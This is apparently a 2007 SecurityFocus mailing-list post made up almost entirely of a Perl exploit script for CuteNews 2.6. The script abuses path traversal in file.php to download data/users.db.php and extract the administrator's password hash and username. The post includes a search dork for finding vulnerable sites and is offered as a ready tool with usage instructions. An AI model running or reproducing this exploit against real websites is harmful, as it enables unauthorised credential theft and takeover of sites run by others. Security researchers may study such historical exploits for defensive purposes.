CuteNews Arbitrary File Download AllVersion Dec 29 2007 08:17PM
pawel2827 gmail com
!/usr/bin/perl

#Found by Pr0metheuS

#Coded by Pr0metheuS

#CuteNews 2.6 ( module file.php )

#Gr33tz-TeaM

#Dork : inurl:/cutenews/file.php

use LWP::UserAgent;

if(@ARGV!=2){

print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";

print "-=-=-= CuteNews Arbitrary File Download -=-=-=-=-\n";

print "-=-=-= By Pr0metheuS -=-=-=-=-\n";

print "-=-=-= Gr33tz - TeaM -=-=-=-=-\n";

print "-=-=-= Gr33tz To : -=-=-=-=-\n";

print "-=-=-= pawel2827, d3d!k, J4Z0, chez, fir3 -=-=-=-=-\n";

print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";

print "USAGE : perl $0 <SITE> <PATH>\n";

exit;

}

($SITE,$PATH)=@ARGV;

$ua = new LWP::UserAgent;

$ua->agent("Mozilla/8.0");

$ua = LWP::UserAgent->new;

my $req = HTTP::Request->new(GET => "$SITE$PATH/file.php?file=../../data/users.db.php");

$req->header('Accept' => 'text/html');

$res = $ua->request($req);

$con = $res->content;

if($res->is_success){

if($con =~ /([0-9a-fA-F]{32})/){

$hash = $1;

print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";

print "-=-=-= CuteNews Arbitrary File Download -=-=-=-=-\n";

print "-=-=-= By Pr0metheuS -=-=-=-=-\n";

print "-=-=-= Gr33tz - TeaM -=-=-=-=-\n";

print "-=-=-= Gr33tz To : -=-=-=-=-\n";

print "-=-=-= pawel2827, d3d!k, J4Z0, chez, fir3 -=-=-=-=-\n";

print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";

print "_____________________________\n";

print "[+] Exploit Work!\n";

print "[+] Admin Pass : ".$hash."\n";

$ua2 = new LWP::UserAgent;

$ua2->agent("Mozilla/8.0");

$ua2 = LWP::UserAgent->new;

my $req2 = HTTP::Request->new(GET => "$SITE$PATH/file.php?file=../../data/users.db.php");

$req2->header('Accept' => 'text/html');

$res2 = $ua2->request($req2);

$con2 = $res2->content;

if($con2 =~ /\|.\|(.*)\|$hash\|/){

$user = $1;

print "[+] Admin Username : ".$user."\n";

}

}

else{

print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";

print "-=-=-= CuteNews Arbitrary File Download -=-=-=-=-\n";

print "-=-=-= By Pr0metheuS -=-=-=-=-\n";

print "-=-=-= Gr33tz - TeaM -=-=-=-=-\n";

print "-=-=-= Gr33tz To : -=-=-=-=-\n";

print "-=-=-= pawel2827, d3d!k, J4Z0, chez, fir3 -=-=-=-=-\n";

print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";

print "_____________________________\n";

print "[+] Connect failed..\n";

}

}

else{

print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";

print "-=-=-= CuteNews Arbitrary File Download -=-=-=-=-\n";

print "-=-=-= By Pr0metheuS -=-=-=-=-\n";

print "-=-=-= Gr33tz - TeaM -=-=-=-=-\n";

print "-=-=-= Gr33tz To : -=-=-=-=-\n";

print "-=-=-= pawel2827, d3d!k, J4Z0, chez, fir3 -=-=-=-=-\n";

print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";

print "_____________________________\n";

print "[+] Exploit Failed..\n";

}

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus